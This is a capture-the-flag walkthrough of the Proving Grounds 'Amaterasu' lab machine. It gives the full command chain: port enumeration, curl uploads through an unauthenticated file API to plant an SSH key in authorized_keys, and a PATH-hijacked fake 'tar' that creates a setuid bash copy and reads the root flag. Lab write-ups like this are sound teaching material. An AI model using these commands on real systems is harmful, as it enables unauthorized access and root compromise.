PG - Amaterasu

PG – Amaterasu

In this walk through, we will be going through the Amaterasu room from Proving Grounds. This room is rated as Easy on the platform and it consists of exploitation via Python File Server API to get the initial access. For privilege escalation, Path Hijacking is required to get root. So, let’s get started without any delay.

Amaterasu

Machine Info:

TitleAmaterasu
IPaddress192.168.196.249
DifficultyEasy
OSLinux
DescriptionAmaterasu is an easy machine that is designed to test the enumeration skills of the user. Initial Access is taken via Python File Server API followed by a Path Hijacking privilege escalation attack to get root.

Enumeration:

  • I started off with my regular aggressive nmap scan and found only port open – 21 (FTP). That was strange for a bit.

$ sudo nmap -A 192.168.196.249
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-12 23:14 IST

Nmap scan report for 192.168.196.249
Host is up (0.18s latency).
Not shown: 992 filtered ports
PORT      STATE  SERVICE          VERSION
21/tcp    open   ftp              vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.45.221
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| vulners: 
|   cpe:/a:vsftpd:vsftpd:3.0.3: 
|     	PRION:CVE-2021-3618	5.8	https://vulners.com/prion/PRION:CVE-2021-3618
|_    	PRION:CVE-2021-30047	5.0	https://vulners.com/prion/PRION:CVE-2021-30047
22/tcp    closed ssh
111/tcp   closed rpcbind
139/tcp   closed netbios-ssn
443/tcp   closed https
445/tcp   closed microsoft-ds
2049/tcp  closed nfs
10000/tcp closed snet-sensor-mgmt
Aggressive OS guesses: Linux 2.6.32 (88%), Linux 2.6.32 or 3.10 (88%), Linux 2.6.39 (88%), Linux 3.10 - 3.12 (88%), Linux 3.4 (88%), Synology DiskStation Manager 5.1 (87%), Linux 4.9 (87%), Linux 3.5 (87%), Linux 4.2 (87%), Linux 4.4 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Unix

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   174.74 ms 192.168.45.1
2   174.70 ms 192.168.45.254
3   174.78 ms 192.168.251.1
4   176.10 ms 192.168.196.249

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.61 seconds

nmap scan

  • Next, i performed a full TCP port scan and found three additional unknown ports running on high port numbers – 25022, 33414, 40080.

sudo nmap -sS -T5 -p- 192.168.196.249

All TCP port scan

Enumerating Port 21 (FTP)

  • I started my enumeration with FTP and logged in using “anonymous” credentials into the server however i was unable to list the directories inside it as it was timing out.

ftp 192.168.196.249

FTP login

Enumerating Port 33414 & 40080

  • Next, i enumerated port 33414 it was running a web server however found nothing on the index page. We will come back to it later. Let’s move on for now.

Not Found

  • The port number 40080 reveals a static web page related to Mozilla. Found nothing interesting in the page source code and in the site’s contents.

Mozilla is cool

  • Next, fired gobuster on the server running on port 40080 and 33414 to reveals some hidden juicy directories. Found nothing interesting 40080 however the scan for 33414 reveals two interesting endpoints – /help and /info.

gobuster dir -u http://192.168.196.249:40080/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -t 20

gobuster scan

$ gobuster dir -u http://192.168.196.249:33414/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.196.249:33414/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/12 23:35:24 Starting gobuster in directory enumeration mode
===============================================================
/help                 (Status: 200) [Size: 137]
/info                 (Status: 200) [Size: 98] 
                                               
===============================================================
2024/01/12 23:48:00 Finished
===============================================================

gobuster scan

  • Looking at the found directories on port 33414 reveals a “Python File Server REST API” on the server. With the help of this, we can list any directory on the server and upload files to it. Bingo!

help API endpoint

info API endpoint

listing the contents of /tmp directory

  • In the background, i have also had initiated a full aggressive scan on the newly found ports and the results shows that port 25022 is running SSH on it. While 33414 and 40080 we have already explored.

sudo nmap -A -p 25022,33414,40080 192.168.196.249

Full Aggressive scan output

Full Aggressive scan output

  • Moving on with our enumeration using the API endpoint, we can look into the home directory of user “alfredo” and also its ssh directory. That means, if we can upload our public key in the folder using the API functionality, then we can log in as user alfredo into the server via SSH.

alfredo home directory

contents of alfredo home directory

peeking inside .ssh directory

Initial Access:

  • To test our hypothesis, let’s first upload a text file on to the server using the below command.

curl -i -L -X POST -H "Content-Type: multipart/form-data" -F file="@/home/wh1terose/CTF/PG-Play/machines/Amaterasu/test.txt" -F filename="/home/alfredo/test.txt" http://192.168.196.249:33414/file-upload

uploading a text file via curl

  • The above command gives us a positive result as we were able to successfully upload a file onto the server using the File Server API.

file successfully uploaded

  • Now, let’s generated a SSH key pair using ssh-keygen. Save it in your current working directory.

ssh-keygen

ssh-keygen

  • Now we will upload our RSA public key in the .SSH folder of user alfredo. I was getting a little hiccup here while uploading as the API only accepts certain extensions. So, i changed the extension of my target file to id_rsa.pub.txt and the uploaded file name will be authorized_keys. Using the below command gives me a successful hit.

curl -i -L -X POST -H "Content-Type: multipart/form-data" -F file="@/home/wh1terose/CTF/PG-Play/machines/Amaterasu/id_rsa.pub.txt" -F filename="/home/alfredo/.ssh/authorized_keys" http://192.168.165.249:33414/file-upload

uploading our RSA Public key

  • With the help of our earlier generated RSA private key logged into the server via SSH. Thus, getting the initial foothold and captured the local flag.

chmod 600 id_rsa
ssh -i id_rsa [email protected] -p 25022

logged in as user alfredo

local flag

Privilege Escalation:

  • Performed some post-compromise enumeration on the target and found one interesting cron job entry. A script name “backup-flask.sh” is running as root for about 30 seconds. I looked inside the file and found out that it is first setting up the PATH variable to the user alfredo home directory inside the restapi folder and then using tar to create a backup of the file inside the directory. That means, we can perform a Path hijacking attack on the “tar” binary as it is not using an absolute path. Once the cron job will execute the script, our malicious tar binary will also be executed in place of the original one. Thus, giving us root on the system.

cat /etc/crontab

ls -l /usr/local/bin/backup-flask.sh

cat /usr/local/bin/backup-flask.sh

cat /etc/crontab

  • I tried to make a copy of the bash binary and was able to get it to work by executing as root but i didn’t got root for some reason. Earlier, i have also tried to get a reverse shell but the machine was not pinging to my local box for some reason. Ideally, it should have worked but it didn’t.

echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > tar
chmod 777 tar
export PATH=/home/alfredo/restapi:$PATH
echo $PATH

path hijacking attack

./bash -p

  • So, i used the same technique to just get the root flag and completed the challenge.

echo -ne '#!/bin/bash\n cat /root/proof.txt > /tmp/flag.txt' > tar
chmod 777 tar
export PATH=/home/alfredo/restapi:$PATH
echo $PATH

flag.txt

Also Read: PG – Access

Conclusion:

Conclusion

So that was “Amaterasu” for you. We started off with a regular nmap scan and found a few ports open. Started the enumeration on web server running on port 33414 and found a Python File Server REST API v2.5 installation. Abused it to upload my SSH Keys on target alfredo’s SSH directory, thus giving us initial access. Then, found a backup-flash.sh script in the cron jobs that was creating a backup of the restapi directory using tar. Abused the tar binary with Path Hijacking technique to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top